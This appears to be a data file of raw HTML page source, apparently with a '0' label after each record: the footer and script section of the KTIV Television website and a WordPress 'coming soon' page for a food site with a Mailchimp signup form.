elementor-element-9fcee40 elementor-hidden-tablet elementor-hidden-phone elementor-widget elementor-widget-wp-widget-ad_placement" data-element_type="wp-widget-ad_placement.default"> <div class="elementor-widget-container"> <div id="div-gpt-ad-5" class="div-gpt-ad div-gpt-widget"></div> <script> googletag.cmd.push(function () { googletag.display('div-gpt-ad-5'); }); </script> </div> </div> </div> </div> </div> </div> </div> </section> </div> </div> </div> </div> <footer class="entry-footer"> <div class="entry-edit"> </div> </footer> </div> </article> </section><!-- section#main --> </div><!-- #content --> </div><!-- .container --> </div><!-- #primary --> </div><!--Layout Content---> <div id="footer-widgets"> <div class="container"> <div class="row"> <section id="pojo_image_text-3" class="widget widget_pojo_image_text col-sm-4"><div class="widget-inner"><div class="pojo-image-text"><a href="http://www.ktiv.com"><img src="http://ktiv.com/wp-content/uploads/sites/4/2018/05/ktiv-e1526493608612.png" alt="" class="image-text-thumbnail alignleft" /></a><div class="image-text-body"><p class="image-text-description"><br><b>KTIV Television</b><br /> 2929 Signal Hill Drive Sioux City, IA 51108<br /> Switchboard: 712-239-4100 or 800-234-KTIV(5848)</p></div></div></div></section><section id="custom_html-3" class="widget_text widget widget_custom_html col-sm-4"><div class="widget_text widget-inner"><div class="textwidget custom-html-widget"><br><a href="/ktiv-careers">Careers</a>&nbsp;&nbsp;<a href="/advertise-with-ktiv/">Advertise with us</a>&nbsp;&nbsp;<a href="https://xprspay.ipayxepay.net/xprspay/qmi/index.jsp">Advertiser Services</a><br> <a href="https://publicfiles.fcc.gov/tv-profile/ktiv">FCC Public File</a> &nbsp;&nbsp;<a href="https://publicfiles.fcc.gov/api/manager/download/b4a923e3-dd2d-4b1b-a9f0-569c453bab44/517b92c9-22e1-4607-9f68-9b51c1b1da50.pdf">EEO Report</a><br> <a href="/closed-captioning/">Closed Captioning Contact</a></div></div></section><section id="elementor-library-3" class="widget widget_elementor-library col-sm-4"><div class="widget-inner"> <div class="elementor elementor-1305"> <div class="elementor-inner"> <div class="elementor-section-wrap"> <div data-id="1305" class="elementor-element elementor-element-1305 elementor-shape-rounded elementor-widget elementor-widget-social-icons" data-element_type="social-icons.default"> <div class="elementor-widget-container"> <div class="elementor-social-icons-wrapper"> <a class="elementor-icon elementor-social-icon elementor-social-icon-facebook elementor-animation-grow" href="https://www.facebook.com/ktiv4" target="_blank"> <span class="elementor-screen-only">Facebook</span> <i class="fa fa-facebook"></i> </a> <a class="elementor-icon elementor-social-icon elementor-social-icon-twitter elementor-animation-grow" href="https://twitter.com/ktivnews" target="_blank"> <span class="elementor-screen-only">Twitter</span> <i class="fa fa-twitter"></i> </a> <a class="elementor-icon elementor-social-icon elementor-social-icon-instagram elementor-animation-grow" href="https://www.instagram.com/ktiv4/" target="_blank"> <span class="elementor-screen-only">Instagram</span> <i class="fa fa-instagram"></i> </a> <a class="elementor-icon elementor-social-icon elementor-social-icon-envelope elementor-animation-grow" href="http://www.ktiv.com/story/8398816/contact-ktiv" target="_blank"> <span class="elementor-screen-only">Envelope</span> <i class="fa fa-envelope"></i> </a> </div> </div> </div> </div> </div> </div> </div></section><section id="search-3" class="widget widget_search col-sm-4"><div class="widget-inner"><h5 class="widget-title"><span>Looking for something?</span></h5><form role="search" method="get" class="form form-search" action="https://ktiv.com/"> <label for="s"> <span class="sr-only">Search for:</span> <input type="search" title="Search" name="s" value="" placeholder="Search..." class="field search-field"> </label> <button value="Search" class="search-submit button" type="submit">Search</button> </form></div></section> </div> </div> </div> <footer id="footer-copyright" role="contentinfo"> <div class="container"> <div class="content-copyright"> <div class="pull-left-copyright"> All content © Copyright 2000 - 2019 KTIV Television. All Rights Reserved. For more information on this site, please read our <a href="/privacy-policy">Privacy Policy</a>, <a href="/terms-of-service">Terms of Service</a>, and <a href="http://www.aboutads.info/choices">Ad Choices</a>. </div> <div class="pull-right-copyright"> </div> </div> </div><!-- .container --> </footer> </div><!-- #container --> <script type="text/javascript"> var _sf_async_config={}; _sf_async_config.uid = 39189; _sf_async_config.domain = "ktiv.com"; _sf_async_config.useCanonical = true; (function(){ function loadChartbeat() { window._sf_endpt=(new Date()).getTime(); var e = document.createElement('script'); e.setAttribute('language', 'javascript'); e.setAttribute('type', 'text/javascript'); e.setAttribute('src', '//static.chartbeat.com/js/chartbeat.js'); document.body.appendChild(e); } var oldonload = window.onload; window.onload = (typeof window.onload != 'function') ? loadChartbeat : function() { try { oldonload(); } catch (e) { loadChartbeat(); throw e} loadChartbeat(); }; })(); </script> <div id="pojo-scroll-up" class="pojo-scroll-up-right" data-offset="50" data-duration="750" style="font-size: 36px;border-radius: 6px"> <div class="pojo-scroll-up-inner"> <a class="pojo-scroll-up-button" href="javascript:void(0);" title="Scroll to top"> <span class="fa fa-chevron-up"></span><span class="sr-only">Scroll to top</span> </a> </div> </div> <div class="pswp" tabindex="-1" role="dialog" aria-hidden="true"> <div class="pswp__bg"></div> <div class="pswp__scroll-wrap"> <div class="pswp__container"> <div class="pswp__item"></div> <div class="pswp__item"></div> <div class="pswp__item"></div> </div> <div class="pswp__ui pswp__ui--hidden"> <div class="pswp__top-bar"> <div class="pswp__counter"></div> <button class="pswp__button pswp__button--close" title="Close (Esc)"></button> <button class="pswp__button pswp__button--share" title="Share"></button> <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button> <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button> <div class="pswp__preloader"> <div class="pswp__preloader__icn"> <div class="pswp__preloader__cut"> <div class="pswp__preloader__donut"></div> </div> </div> </div> </div> <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap"> <div class="pswp__share-tooltip"></div> </div> <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)"> </button> <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)"> </button> <div class="pswp__caption"> <div class="pswp__caption__center"></div> </div> </div> </div> </div> <link rel='stylesheet' id='elementor-post-1305-css' href='https://ktiv.com/wp-content/uploads/sites/4/elementor/css/post-1305.css?ver=1557166713' type='text/css' media='all' /> <script type='text/javascript'> /* <![CDATA[ */ var breakingNews = {"siteURL":"https:\/\/ktiv.com","breakingNewsTitle":"BREAKING NEWS","breakingWeatherTitle":"WEATHER ALERT","breakingNewsBg":"#C13131","breakingWeatherBg":"#ffad01"}; /* ]]> */ </script> <script type='text/javascript' src='https://ktiv.com/wp-content/plugins/cordillera-breaking-news/dist/build.js?ver=1.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var pollsL10n = {"ajax_url":"https:\/\/ktiv.com\/wp-admin\/admin-ajax.php","text_wait":"Your last request is still being processed. Please wait a while ...","text_valid":"Please choose a valid poll answer.","text_multiple":"Maximum number of choices allowed: ","show_loading":"1","show_fading":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://ktiv.com/wp-content/plugins/wp-polls/polls-js.js?ver=2.75.2'></script> <script type='text/javascript' src='https://ktiv.com/wp-content/plugins/pojo-forms/assets/js/app.min.js?ver=4.9.8'></script> <script type='text/javascript'> /* <![CDATA[ */ var PojoA11yOptions = {"focusable":"","remove_link_target":"","add_role_links":"1","enable_save":"1","save_expiration":"12"}; /* ]]> */ </script> <script type='text/javascript' src='https://ktiv.com/wp-content/plugins/pojo-accessibility/assets/js/app.min.js?ver=1.0.0'></script> <script type='text/javascript' src='https://ktiv.com/wp-content/themes/buzz/assets/bootstrap/js/bootstrap.min.js?ver=3.3.5'></script> <script type='text/javascript'> /* <![CDATA[ */ var Pojo = {"ajaxurl":"https:\/\/ktiv.com\/wp-admin\/admin-ajax.php","css_framework_type":"bootstrap","superfish_args":{"delay":150,"animation":{"opacity":"show","height":"show"},"speed":"fast"}}; /* ]]> */ </script> <script type='text/javascript' src='https://ktiv.com/wp-content/themes/buzz/assets/js/frontend.min.js?ver=1.7.12'></script> <script type='text/javascript' src='https://ktiv.com/wp-content/plugins/youtube-embed-plus/scripts/fitvids.min.js?ver=12.2'></script> <script type='text/javascript' src='https://ktiv.com/wp-content/themes/buzz/core/assets/masterslider/masterslider.min.js?ver=2.9.5'></script> <script type='text/javascript' src='https://ktiv.com/wp-content/plugins/pojo-lightbox/assets/photoswipe/photoswipe.min.js?ver=4.1.2'></script> <script type='text/javascript' src='https://ktiv.com/wp-content/plugins/pojo-lightbox/assets/photoswipe/photoswipe-ui-default.min.js?ver=4.1.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var PojoLightboxOptions = {"script_type":"photoswipe","smartphone":"","woocommerce":"","lightbox_args":{"loop":true,"closeOnScroll":true,"closeOnVerticalDrag":true,"escKey":true,"arrowKeys":true,"history":true,"captionEl":true,"closeEl":true,"fullscreenEl":true,"zoomEl":true,"counterEl":true,"arrowEl":true,"shareEl":true}}; /* ]]> */ </script> <script type='text/javascript' src='https://ktiv.com/wp-content/plugins/pojo-lightbox/assets/js/app.min.js?ver=4.9.8'></script> <script type='text/javascript' src='https://ktiv.com/wp-content/plugins/pojo-news-ticker/assets/js/app.min.js?ver=4.9.8'></script> <script type='text/javascript' src='https://ktiv.com/wp-includes/js/wp-embed.min.js?ver=4.9.8'></script> <script type='text/javascript' src='https://ktiv.com/wp-includes/js/imagesloaded.min.js?ver=3.2.0'></script> <script type='text/javascript' src='https://ktiv.com/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?ver=2.1.2'></script> <script type='text/javascript'> /* <![CDATA[ */ var ElementorProFrontendConfig = {"ajaxurl":"https:\/\/ktiv.com\/wp-admin\/admin-ajax.php","nonce":"0ef2655a41","shareButtonsNetworks":{"facebook":{"title":"Facebook","has_counter":true},"twitter":{"title":"Twitter"},"google":{"title":"Google+","has_counter":true},"linkedin":{"title":"LinkedIn","has_counter":true},"pinterest":{"title":"Pinterest","has_counter":true},"reddit":{"title":"Reddit","has_counter":true},"vk":{"title":"VK","has_counter":true},"odnoklassniki":{"title":"OK","has_counter":true},"tumblr":{"title":"Tumblr"},"delicious":{"title":"Delicious"},"digg":{"title":"Digg"},"skype":{"title":"Skype"},"stumbleupon":{"title":"StumbleUpon","has_counter":true},"telegram":{"title":"Telegram"},"pocket":{"title":"Pocket","has_counter":true},"xing":{"title":"XING","has_counter":true},"whatsapp":{"title":"WhatsApp"},"email":{"title":"Email"},"print":{"title":"Print"}},"facebook_sdk":{"lang":"en_US","app_id":""}}; /* ]]> */ </script> <script type='text/javascript' src='https://ktiv.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=2.1.2'></script> <script type='text/javascript' src='https://ktiv.com/wp-includes/js/jquery/ui/position.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://ktiv.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.4.1'></script> <script type='text/javascript' src='https://ktiv.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2'></script> <script type='text/javascript' src='https://ktiv.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.jquery.min.js?ver=4.4.3'></script> <script type='text/javascript'> /* <![CDATA[ */ var elementorFrontendConfig = {"isEditMode":"","is_rtl":"","breakpoints":{"xs":0,"sm":480,"md":768,"lg":1025,"xl":1440,"xxl":1600},"urls":{"assets":"https:\/\/ktiv.com\/wp-content\/plugins\/elementor\/assets\/"},"settings":{"page":[],"general":{"elementor_global_image_lightbox":"yes","elementor_enable_lightbox_in_editor":"yes"}},"post":{"id":12,"title":"Home","excerpt":""}}; /* ]]> */ </script> <script type='text/javascript' src='https://ktiv.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=2.1.6'></script> <a id="pojo-a11y-skip-content" class="pojo-skip-link pojo-skip-content" tabindex="1" accesskey="s" href="#content">Skip to content</a> <nav id="pojo-a11y-toolbar" class="pojo-a11y-toolbar-right pojo-a11y-visible-desktop" role="navigation"> <div class="pojo-a11y-toolbar-toggle"> <a class="pojo-a11y-toolbar-link pojo-a11y-toolbar-toggle-link" href="javascript:void(0);" title="Accessibility Tools"> <span class="pojo-sr-only sr-only">Open toolbar</span> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100" fill="currentColor" width="1em"> <path d="M50 8.1c23.2 0 41.9 18.8 41.9 41.9 0 23.2-18.8 41.9-41.9 41.9C26.8 91.9 8.1 73.2 8.1 50S26.8 8.1 50 8.1M50 0C22.4 0 0 22.4 0 50s22.4 50 50 50 50-22.4 50-50S77.6 0 50 0zm0 11.3c-21.4 0-38.7 17.3-38.7 38.7S28.6 88.7 50 88.7 88.7 71.4 88.7 50 71.4 11.3 50 11.3zm0 8.9c4 0 7.3 3.2 7.3 7.3S54 34.7 50 34.7s-7.3-3.2-7.3-7.3 3.3-7.2 7.3-7.2zm23.7 19.7c-5.8 1.4-11.2 2.6-16.6 3.2.2 20.4 2.5 24.8 5 31.4.7 1.9-.2 4-2.1 4.7-1.9.7-4-.2-4.7-2.1-1.8-4.5-3.4-8.2-4.5-15.8h-2c-1 7.6-2.7 11.3-4.5 15.8-.7 1.9-2.8 2.8-4.7 2.1-1.9-.7-2.8-2.8-2.1-4.7 2.6-6.6 4.9-11 5-31.4-5.4-.6-10.8-1.8-16.6-3.2-1.7-.4-2.8-2.1-2.4-3.9.4-1.7 2.1-2.8 3.9-2.4 19.5 4.6 25.1 4.6 44.5 0 1.7-.4 3.5.7 3.9 2.4.7 1.8-.3 3.5-2.1 3.9z"/> </svg> </a> </div> <div class="pojo-a11y-toolbar-overlay"> <div class="pojo-a11y-toolbar-inner"> <p class="pojo-a11y-toolbar-title">Accessibility Tools</p> <ul class="pojo-a11y-toolbar-items pojo-a11y-tools"> <li class="pojo-a11y-toolbar-item"> <a href="#" class="pojo-a11y-toolbar-link pojo-a11y-btn-resize-font pojo-a11y-btn-resize-plus" data-action="resize-plus" data-action-group="resize" tabindex="-1"> <span class="pojo-a11y-toolbar-icon"><svg version="1.1" xmlns="http://www.w3.org/2000/svg" width="1em" viewBox="0 0 448 448"><path fill="currentColor" d="M256 200v16c0 4.25-3.75 8-8 8h-56v56c0 4.25-3.75 8-8 8h-16c-4.25 0-8-3.75-8-8v-56h-56c-4.25 0-8-3.75-8-8v-16c0-4.25 3.75-8 8-8h56v-56c0-4.25 3.75-8 8-8h16c4.25 0 8 3.75 8 8v56h56c4.25 0 8 3.75 8 8zM288 208c0-61.75-50.25-112-112-112s-112 50.25-112 112 50.25 112 112 112 112-50.25 112-112zM416 416c0 17.75-14.25 32-32 32-8.5 0-16.75-3.5-22.5-9.5l-85.75-85.5c-29.25 20.25-64.25 31-99.75 31-97.25 0-176-78.75-176-176s78.75-176 176-176 176 78.75 176 176c0 35.5-10.75 70.5-31 99.75l85.75 85.75c5.75 5.75 9.25 14 9.25 22.5z""></path></svg></span><span class="pojo-a11y-toolbar-text">Increase Text</span> </a> </li> <li class="pojo-a11y-toolbar-item"> <a href="#" class="pojo-a11y-toolbar-link pojo-a11y-btn-resize-font pojo-a11y-btn-resize-minus" data-action="resize-minus" data-action-group="resize" tabindex="-1"> <span class="pojo-a11y-toolbar-icon"><svg version="1.1" xmlns="http://www.w3.org/2000/svg" width="1em" viewBox="0 0 448 448"><path fill="currentColor" d="M256 200v16c0 4.25-3.75 8-8 8h-144c-4.25 0-8-3.75-8-8v-16c0-4.25 3.75-8 8-8h144c4.25 0 8 3.75 8 8zM288 208c0-61.75-50.25-112-112-112s-112 50.25-112 112 50.25 112 112 112 112-50.25 112-112zM416 416c0 17.75-14.25 32-32 32-8.5 0-16.75-3.5-22.5-9.5l-85.75-85.5c-29.25 20.25-64.25 31-99.75 31-97.25 0-176-78.75-176-176s78.75-176 176-176 176 78.75 176 176c0 35.5-10.75 70.5-31 99.75l85.75 85.75c5.75 5.75 9.25 14 9.25 22.5z"></path></svg></span><span class="pojo-a11y-toolbar-text">Decrease Text</span> </a> </li> <li class="pojo-a11y-toolbar-item"> <a href="#" class="pojo-a11y-toolbar-link pojo-a11y-btn-background-group pojo-a11y-btn-grayscale" data-action="grayscale" data-action-group="schema" tabindex="-1"> <span class="pojo-a11y-toolbar-icon"><svg version="1.1" xmlns="http://www.w3.org/2000/svg" width="1em" viewBox="0 0 448 448"><path fill="currentColor" d="M15.75 384h-15.75v-352h15.75v352zM31.5 383.75h-8v-351.75h8v351.75zM55 383.75h-7.75v-351.75h7.75v351.75zM94.25 383.75h-7.75v-351.75h7.75v351.75zM133.5 383.75h-15.5v-351.75h15.5v351.75zM165 383.75h-7.75v-351.75h7.75v351.75zM180.75 383.75h-7.75v-351.75h7.75v351.75zM196.5 383.75h-7.75v-351.75h7.75v351.75zM235.75 383.75h-15.75v-351.75h15.75v351.75zM275 383.75h-15.75v-351.75h15.75v351.75zM306.5 383.75h-15.75v-351.75h15.75v351.75zM338 383.75h-15.75v-351.75h15.75v351.75zM361.5 383.75h-15.75v-351.75h15.75v351.75zM408.75 383.75h-23.5v-351.75h23.5v351.75zM424.5 383.75h-8v-351.75h8v351.75zM448 384h-15.75v-352h15.75v352z"></path></svg></span><span class="pojo-a11y-toolbar-text">Grayscale</span> </a> </li> <li class="pojo-a11y-toolbar-item"> <a href="#" class="pojo-a11y-toolbar-link pojo-a11y-btn-background-group pojo-a11y-btn-high-contrast" data-action="high-contrast" data-action-group="schema" tabindex="-1"> <span class="pojo-a11y-toolbar-icon"><svg version="1.1" xmlns="http://www.w3.org/2000/svg" width="1em" viewBox="0 0 448 448"><path fill="currentColor" d="M192 360v-272c-75 0-136 61-136 136s61 136 136 136zM384 224c0 106-86 192-192 192s-192-86-192-192 86-192 192-192 192 86 192 192z""></path></svg></span><span class="pojo-a11y-toolbar-text">High Contrast</span> </a> </li> <li class="pojo-a11y-toolbar-item"> <a href="#" class="pojo-a11y-toolbar-link pojo-a11y-btn-background-group pojo-a11y-btn-negative-contrast" data-action="negative-contrast" data-action-group="schema" tabindex="-1"> <span class="pojo-a11y-toolbar-icon"><svg version="1.1" xmlns="http://www.w3.org/2000/svg" width="1em" viewBox="0 0 448 448"><path fill="currentColor" d="M416 240c-23.75-36.75-56.25-68.25-95.25-88.25 10 17 15.25 36.5 15.25 56.25 0 61.75-50.25 112-112 112s-112-50.25-112-112c0-19.75 5.25-39.25 15.25-56.25-39 20-71.5 51.5-95.25 88.25 42.75 66 111.75 112 192 112s149.25-46 192-112zM236 144c0-6.5-5.5-12-12-12-41.75 0-76 34.25-76 76 0 6.5 5.5 12 12 12s12-5.5 12-12c0-28.5 23.5-52 52-52 6.5 0 12-5.5 12-12zM448 240c0 6.25-2 12-5 17.25-46 75.75-130.25 126.75-219 126.75s-173-51.25-219-126.75c-3-5.25-5-11-5-17.25s2-12 5-17.25c46-75.5 130.25-126.75 219-126.75s173 51.25 219 126.75c3 5.25 5 11 5 17.25z"></path></svg></span><span class="pojo-a11y-toolbar-text">Negative Contrast</span> </a> </li> <li class="pojo-a11y-toolbar-item"> <a href="#" class="pojo-a11y-toolbar-link pojo-a11y-btn-background-group pojo-a11y-btn-light-background" data-action="light-background" data-action-group="schema" tabindex="-1"> <span class="pojo-a11y-toolbar-icon"><svg version="1.1" xmlns="http://www.w3.org/2000/svg" width="1em" viewBox="0 0 448 448"><path fill="currentColor" d="M184 144c0 4.25-3.75 8-8 8s-8-3.75-8-8c0-17.25-26.75-24-40-24-4.25 0-8-3.75-8-8s3.75-8 8-8c23.25 0 56 12.25 56 40zM224 144c0-50-50.75-80-96-80s-96 30-96 80c0 16 6.5 32.75 17 45 4.75 5.5 10.25 10.75 15.25 16.5 17.75 21.25 32.75 46.25 35.25 74.5h57c2.5-28.25 17.5-53.25 35.25-74.5 5-5.75 10.5-11 15.25-16.5 10.5-12.25 17-29 17-45zM256 144c0 25.75-8.5 48-25.75 67s-40 45.75-42 72.5c7.25 4.25 11.75 12.25 11.75 20.5 0 6-2.25 11.75-6.25 16 4 4.25 6.25 10 6.25 16 0 8.25-4.25 15.75-11.25 20.25 2 3.5 3.25 7.75 3.25 11.75 0 16.25-12.75 24-27.25 24-6.5 14.5-21 24-36.75 24s-30.25-9.5-36.75-24c-14.5 0-27.25-7.75-27.25-24 0-4 1.25-8.25 3.25-11.75-7-4.5-11.25-12-11.25-20.25 0-6 2.25-11.75 6.25-16-4-4.25-6.25-10-6.25-16 0-8.25 4.5-16.25 11.75-20.5-2-26.75-24.75-53.5-42-72.5s-25.75-41.25-25.75-67c0-68 64.75-112 128-112s128 44 128 112z"></path></svg></span><span class="pojo-a11y-toolbar-text">Light Background</span> </a> </li> <li class="pojo-a11y-toolbar-item"> <a href="#" class="pojo-a11y-toolbar-link pojo-a11y-btn-links-underline" data-action="links-underline" data-action-group="toggle" tabindex="-1"> <span class="pojo-a11y-toolbar-icon"><svg version="1.1" xmlns="http://www.w3.org/2000/svg" width="1em" viewBox="0 0 448 448"><path fill="currentColor" d="M364 304c0-6.5-2.5-12.5-7-17l-52-52c-4.5-4.5-10.75-7-17-7-7.25 0-13 2.75-18 8 8.25 8.25 18 15.25 18 28 0 13.25-10.75 24-24 24-12.75 0-19.75-9.75-28-18-5.25 5-8.25 10.75-8.25 18.25 0 6.25 2.5 12.5 7 17l51.5 51.75c4.5 4.5 10.75 6.75 17 6.75s12.5-2.25 17-6.5l36.75-36.5c4.5-4.5 7-10.5 7-16.75zM188.25 127.75c0-6.25-2.5-12.5-7-17l-51.5-51.75c-4.5-4.5-10.75-7-17-7s-12.5 2.5-17 6.75l-36.75 36.5c-4.5 4.5-7 10.5-7 16.75 0 6.5 2.5 12.5 7 17l52 52c4.5 4.5 10.75 6.75 17 6.75 7.25 0 13-2.5 18-7.75-8.25-8.25-18-15.25-18-28 0-13.25 10.75-24 24-24 12.75 0 19.75 9.75 28 18 5.25-5 8.25-10.75 8.25-18.25zM412 304c0 19-7.75 37.5-21.25 50.75l-36.75 36.5c-13.5 13.5-31.75 20.75-50.75 20.75-19.25 0-37.5-7.5-51-21.25l-51.5-51.75c-13.5-13.5-20.75-31.75-20.75-50.75 0-19.75 8-38.5 22-52.25l-22-22c-13.75 14-32.25 22-52 22-19 0-37.5-7.5-51-21l-52-52c-13.75-13.75-21-31.75-21-51 0-19 7.75-37.5 21.25-50.75l36.75-36.5c13.5-13.5 31.75-20.75 50.75-20.75 19.25 0 37.5 7.5 51 21.25l51.5 51.75c13.5 13.5 20.75 31.75 20.75 50.75 0 19.75-8 38.5-22 52.25l22 22c13.75-14 32.25-22 52-22 19 0 37.5 7.5 51 21l52 52c13.75 13.75 21 31.75 21 51z"></path></svg></span><span class="pojo-a11y-toolbar-text">Links Underline</span> </a> </li> <li class="pojo-a11y-toolbar-item"> <a href="#" class="pojo-a11y-toolbar-link pojo-a11y-btn-readable-font" data-action="readable-font" data-action-group="toggle" tabindex="-1"> <span class="pojo-a11y-toolbar-icon"><svg version="1.1" xmlns="http://www.w3.org/2000/svg" width="1em" viewBox="0 0 448 448"><path fill="currentColor" d="M181.25 139.75l-42.5 112.5c24.75 0.25 49.5 1 74.25 1 4.75 0 9.5-0.25 14.25-0.5-13-38-28.25-76.75-46-113zM0 416l0.5-19.75c23.5-7.25 49-2.25 59.5-29.25l59.25-154 70-181h32c1 1.75 2 3.5 2.75 5.25l51.25 120c18.75 44.25 36 89 55 133 11.25 26 20 52.75 32.5 78.25 1.75 4 5.25 11.5 8.75 14.25 8.25 6.5 31.25 8 43 12.5 0.75 4.75 1.5 9.5 1.5 14.25 0 2.25-0.25 4.25-0.25 6.5-31.75 0-63.5-4-95.25-4-32.75 0-65.5 2.75-98.25 3.75 0-6.5 0.25-13 1-19.5l32.75-7c6.75-1.5 20-3.25 20-12.5 0-9-32.25-83.25-36.25-93.5l-112.5-0.5c-6.5 14.5-31.75 80-31.75 89.5 0 19.25 36.75 20 51 22 0.25 4.75 0.25 9.5 0.25 14.5 0 2.25-0.25 4.5-0.5 6.75-29 0-58.25-5-87.25-5-3.5 0-8.5 1.5-12 2-15.75 2.75-31.25 3.5-47 3.5z"></path></svg></span><span class="pojo-a11y-toolbar-text">Readable Font</span> </a> </li> <li class="pojo-a11y-toolbar-item"> <a href="#" class="pojo-a11y-toolbar-link pojo-a11y-btn-reset" data-action="reset" tabindex="-1"> <span class="pojo-a11y-toolbar-icon"><svg version="1.1" xmlns="http://www.w3.org/2000/svg" width="1em" viewBox="0 0 448 448"><path fill="currentColor" d="M384 224c0 105.75-86.25 192-192 192-57.25 0-111.25-25.25-147.75-69.25-2.5-3.25-2.25-8 0.5-10.75l34.25-34.5c1.75-1.5 4-2.25 6.25-2.25 2.25 0.25 4.5 1.25 5.75 3 24.5 31.75 61.25 49.75 101 49.75 70.5 0 128-57.5 128-128s-57.5-128-128-128c-32.75 0-63.75 12.5-87 34.25l34.25 34.5c4.75 4.5 6 11.5 3.5 17.25-2.5 6-8.25 10-14.75 10h-112c-8.75 0-16-7.25-16-16v-112c0-6.5 4-12.25 10-14.75 5.75-2.5 12.75-1.25 17.25 3.5l32.5 32.25c35.25-33.25 83-53 132.25-53 105.75 0 192 86.25 192 192z"></path></svg></span> <span class="pojo-a11y-toolbar-text">Reset</span> </a> </li> </ul> </div> </div> </nav> <script type="text/javascript">window.NREUM||(NREUM={});NREUM.info={"beacon":"bam.nr-data.net","licenseKey":"277133278b","applicationID":"95576464","transactionName":"Yl0BZUMHVxYFAEcIV1sXIlJFD1YLSwpdBV1N","queueTime":0,"applicationTime":1474,"atts":"ThoCEwsdRBg=","errorBeacon":"bam.nr-data.net","agent":""}</script></body> </html>
0
<!DOCTYPE html> <html class="no-js seed-csp4" lang="en"> <head> <meta charset="utf-8"> <title></title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <!-- Bootstrap and default Style --> <link rel="stylesheet" href="https://www.thehotmesskitchen.com/wp-content/plugins/coming-soon/themes/default/bootstrap/css/bootstrap.min.css"> <link rel="stylesheet" href="https://www.thehotmesskitchen.com/wp-content/plugins/coming-soon/themes/default/style.css"> <style type="text/css"> /* calculated styles */ /* Background Style */ html{ background: #fafafa; } .seed-csp4 body{ background: transparent; } /* Text Styles */ .seed-csp4 body{ font-family: Helvetica, Arial, sans-serif } .seed-csp4 h1, .seed-csp4 h2, .seed-csp4 h3, .seed-csp4 h4, .seed-csp4 h5, .seed-csp4 h6{ font-family: Helvetica, Arial, sans-serif } .seed-csp4 body{ color:#666666; } .seed-csp4 h1, .seed-csp4 h2, .seed-csp4 h3, .seed-csp4 h4, .seed-csp4 h5, .seed-csp4 h6{ color:#444444; } .seed-csp4 a, .seed-csp4 a:visited, .seed-csp4 a:hover, .seed-csp4 a:active, .seed-csp4 a:focus{ color:#27AE60; } </style> <!-- JS --> <script src="https://www.thehotmesskitchen.com/wp-includes/js/jquery/jquery.js"></script> <script src="https://www.thehotmesskitchen.com/wp-content/plugins/coming-soon/themes/default/bootstrap/js/bootstrap.min.js"></script> </head> <body> <div id="seed-csp4-page"> <div id="seed-csp4-content"> <h1 id="seed-csp4-headline">Get Ready... Something Really Cool Is Coming Soon</h1> <div id="seed-csp4-description"><p style="text-align: center;"><iframe src="https://www.youtube.com/embed/GleQ7Praxr0" width="560" height="315" frameborder="0" allowfullscreen="allowfullscreen"></iframe></p> <p>&nbsp;</p> <p>&nbsp;</p> <p><!-- Begin Mailchimp Signup Form --></p> <p style="text-align: center;"> <style type="text/css"> #mc_embed_signup{background:#fff; clear:left; font:14px Helvetica,Arial,sans-serif; width:100%;}<br /> /* Add your own Mailchimp form style overrides in your site stylesheet or in this style block.<br /> We recommend moving this block and the preceding CSS link to the HEAD of your HTML file. */<br /></style> <style type="text/css"> #mc-embedded-subscribe-form input[type=checkbox]{display: inline; width: auto;margin-right: 10px;}<br /> #mergeRow-gdpr {margin-top: 20px;}<br /> #mergeRow-gdpr fieldset label {font-weight: normal;}<br /> #mc-embedded-subscribe-form .mc_fieldset{border:none;min-height: 0px;padding-bottom:0px;}<br /></style> </p> <div id="mc_embed_signup"> <form id="mc-embedded-subscribe-form" class="validate" action="https://thehotmesskitchen.us14.list-manage.com/subscribe/post?u=d639028084f411e95b38f9b3a&amp;id=3e302ed319" method="post" name="mc-embedded-subscribe-form" novalidate="" target="_blank"> <div id="mc_embed_signup_scroll"><label for="mce-EMAIL">Subscribe</label><br /> <input id="mce-EMAIL" class="email" name="EMAIL" required="" type="email" value="" placeholder="email address" /><br /> <!-- real people should not fill this in and expect good things - do not remove this or risk form bot signups--></div> <div></div> </form> </div> <div style="position: absolute; left: -5000px;" aria-hidden="true"><input tabindex="-1" name="b_d639028084f411e95b38f9b3a_3e302ed319" type="text" value="" /></div> <div class="clear"><input id="mc-embedded-subscribe" class="button" name="subscribe" type="submit" value="Subscribe" /></div> <p><!--End mc_embed_signup--></p> </div> </div><!-- / #seed-csp4-content --> <div id="seed-csp4-credit"><a target="_blank" href="http://www.seedprod.com/?utm_source=coming-soon-credit-link&utm_medium=banner&utm_campaign=coming-soon-plugin-credit-link"><img src="https://www.thehotmesskitchen.com/wp-content/plugins/coming-soon/themes/default/images/seedprod-credit.png"></a></div> <!--[if lt IE 9]> <script> jQuery(document).ready(function($){$.supersized({slides:[ {image : ''} ]});}); </script> <![endif]--> </div> </body> </html> <!-- Coming Soon Page and Maintenance Mode by SeedProd. Learn more: http://www.seedprod.com -->
0
